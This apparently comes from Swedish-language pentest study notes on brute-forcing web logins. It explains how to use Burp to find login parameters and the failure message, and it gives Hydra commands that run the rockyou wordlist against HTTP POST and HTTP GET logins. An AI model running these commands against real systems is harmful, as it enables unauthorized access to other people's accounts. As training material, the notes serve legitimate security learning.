2. HTTP Login Attack

HTTP-POST Attack:

1. Använd Burp för att ta reda på 1. Parameternamnen för inloggningen, och 2. Errortexten vid misslyckad inloggning
2. Exempel Hydra:

sudo hydra -l <username> -P /usr/share/wordlists/rockyou.txt <ip> http-post-form "/index.php:user=username&password=^PASS^:Login failed. Invalid"

HTTP-GET Attack:

sudo hydra -l <username> -P /usr/share/wordlists/rockyou.txt -s 80 -f <ip> http-get